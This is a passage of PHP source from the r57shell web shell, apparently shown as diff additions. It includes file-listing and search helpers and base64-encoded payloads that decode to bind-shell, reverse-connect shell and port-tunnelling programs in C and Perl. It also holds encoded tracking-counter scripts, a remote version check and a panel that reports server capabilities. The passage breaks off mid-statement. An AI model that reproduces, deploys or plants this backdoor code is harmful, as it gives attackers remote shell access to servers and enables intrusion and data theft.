if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo 